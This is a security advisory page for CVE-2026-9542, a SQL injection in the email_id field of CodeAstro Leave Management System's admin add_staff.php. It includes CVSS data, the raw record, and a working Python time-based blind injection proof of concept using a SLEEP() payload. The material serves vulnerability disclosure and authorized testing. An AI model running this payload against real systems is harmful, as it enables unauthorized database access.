Security Vulnerability Report
CVE-2026-9542 CVSS 6.3 MEDIUM

CVE-2026-9542

Published: 2026-05-26 14:16:46
Last Modified: 2026-05-26 19:54:40

Description

A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Manipulating the argument email_id can lead to SQL injection. The attack can be launched remotely; note, however, that the endpoint lives under /admin/ and the CVSS vector rates Privileges Required as Low (PR:L), so the attacker needs some authenticated access to the application (going by the path, an admin-panel session) rather than anonymous access. A public exploit is available and could be used in attacks.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM (CVSS 3.1 base score; the same record also carries a CVSS 4.0 vector scoring 2.1 LOW and a CVSS 2.0 vector scoring 6.5 MEDIUM — see the raw JSON below, and pick the version your triage process uses)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available in this record; the affected product as named in the description is listed below.

CodeAstro Leave Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Going by its name, add_staff.php is a record-creation endpoint, so even a timing probe may insert rows on the target; run it only against a disposable instance you are authorized to test, and expect to need an authenticated admin session (the endpoint is under /admin/ and the vector says PR:L).
python
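import sys
import time
import urllib.error
import urllib.parse
import urllib.request

# Benign value sent for the baseline request and used as the prefix of the
# default injection string.  The original listing's literal here was a
# scraping artifact ("[email protected]"); any well-formed address works.
DEFAULT_EMAIL = "poc@example.com"
# Delay the default probe asks the database for, in seconds.
DEFAULT_SLEEP_SECONDS = 5
# Fraction of the requested delay that must appear on top of the baseline
# round-trip before the probe counts as a hit (absorbs network jitter).
DELAY_TOLERANCE = 0.9


def build_payload(email_payload="", sleep_seconds=DEFAULT_SLEEP_SECONDS):
    """Return the ``email_id`` value to submit for the time-based probe.

    Args:
        email_payload: a complete injection string supplied by the caller.
            An empty string (what the original call site passes) selects
            the default probe.  The original PoC accepted this argument
            but never used it.
        sleep_seconds: delay the default probe asks the database for.

    Returns:
        The string to send as ``email_id``.
    """
    if email_payload:
        return email_payload
    # NOTE(review): assumes a MySQL/MariaDB backend -- SLEEP() is not
    # portable.  The leading quote closes the string literal the parameter
    # lands in; "-- -" comments out the remainder of the statement.
    return f"{DEFAULT_EMAIL}' AND (SELECT SLEEP({int(sleep_seconds)}))-- -"


def is_delayed(elapsed, baseline, sleep_seconds=DEFAULT_SLEEP_SECONDS):
    """Return True when *elapsed* exceeds *baseline* by about *sleep_seconds*.

    The original PoC flagged any response slower than five seconds, which
    reports a slow or overloaded server as vulnerable.  Comparing against
    the round-trip of a benign request removes that false positive.

    Args:
        elapsed: seconds taken by the injected request.
        baseline: seconds taken by a benign request to the same endpoint.
        sleep_seconds: delay the probe asked for; must be positive.

    Raises:
        ValueError: if *sleep_seconds* is not positive (the check would
            otherwise always succeed).
    """
    if sleep_seconds <= 0:
        raise ValueError("sleep_seconds must be positive")
    return (elapsed - baseline) >= sleep_seconds * DELAY_TOLERANCE


def _post_timed(endpoint, data, timeout, headers):
    """POST form-encoded *data* to *endpoint* and time the round-trip.

    Returns:
        ``(elapsed_seconds, final_url)``.  Redirects are followed (urllib's
        default), so *final_url* differs from *endpoint* when the server
        bounced the request, e.g. to a login page.  HTTP error statuses are
        timed like any other response; only transport failures propagate,
        as ``OSError`` (``urllib.error.URLError`` is a subclass of it).
    """
    body = urllib.parse.urlencode(data).encode("utf-8")
    request = urllib.request.Request(
        endpoint, data=body, headers=headers, method="POST"
    )
    started = time.perf_counter()
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            response.read()
            final_url = response.geturl()
    except urllib.error.HTTPError as err:
        # 4xx/5xx: the handler still ran, so the timing is meaningful.
        final_url = err.filename
    return time.perf_counter() - started, final_url


def check_sqli(target_url, email_payload, *, cookie=None,
               sleep_seconds=DEFAULT_SLEEP_SECONDS, timeout=10):
    """Proof of concept for CVE-2026-9542: time-based blind SQL injection
    through the ``email_id`` parameter of ``/admin/add_staff.php``.

    Two POSTs are sent: a benign one to measure the normal round-trip, then
    the injected one.  The verdict is printed and also returned.

    Args:
        target_url: base URL of the installation, e.g. ``http://localhost``.
        email_payload: full ``email_id`` value, or "" for the default probe.
        cookie: ``Cookie`` header value of an authenticated session.  The
            endpoint sits under ``/admin/`` and the advisory's CVSS vector
            carries ``PR:L``, so an anonymous request is expected to be
            redirected or rejected before the query runs; the original PoC
            sent no session at all.
        sleep_seconds: delay the default probe requests from the database.
        timeout: socket timeout; must comfortably exceed *sleep_seconds*
            plus the baseline round-trip, otherwise a true positive shows
            up as a timeout error instead of a confirmed delay.

    Returns:
        True when the injected delay was observed, False otherwise
        (including when a request failed).

    WARNING: going by its name, add_staff.php is a record-creation endpoint,
    so every probe -- the baseline included -- may insert a staff row on the
    target.  Use only against a disposable instance you are authorised to
    test.
    """
    endpoint = f"{target_url.rstrip('/')}/admin/add_staff.php"
    headers = {"User-Agent": "CVE-2026-9542-poc"}
    if cookie:
        headers["Cookie"] = cookie
    payload = build_payload(email_payload, sleep_seconds)
    try:
        print(f"[+] Measuring baseline round-trip to {endpoint}...")
        baseline, _ = _post_timed(
            endpoint, {"email_id": DEFAULT_EMAIL}, timeout, headers
        )
        print(f"[+] Sending payload to {endpoint}...")
        elapsed, final_url = _post_timed(
            endpoint, {"email_id": payload}, timeout, headers
        )
    except OSError as exc:  # URLError, socket timeout, connection refused
        print(f"[Error] Request failed: {exc}")
        return False
    if final_url != endpoint:
        # A bounce away from the admin page is the usual sign of a missing
        # or expired session; without one the query is never reached.
        print(f"[-] Note: request ended at {final_url}; if that is a login "
              "page, supply an admin session cookie.")
    if is_delayed(elapsed, baseline, sleep_seconds):
        print("[!] Vulnerability confirmed: Server response delayed (SQL Injection).")
        return True
    print("[-] Vulnerability not detected or payload incorrect.")
    return False


if __name__ == "__main__":
    # usage: poc.py [target_url] [admin_session_cookie]
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    session_cookie = sys.argv[2] if len(sys.argv) > 2 else None
    sys.exit(0 if check_sqli(target, "", cookie=session_cookie) else 1)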

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9542", "sourceIdentifier": "[email protected]", "published": "2026-05-26T14:16:46.173", "lastModified": "2026-05-26T19:54:40.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Executing a manipulation of the argument email_id can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]"}, {"url": "https://github.com/wangchaoxing/CVE/issues/8", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/814866", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365603", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365603/cti", "source": "[email protected]"}]}}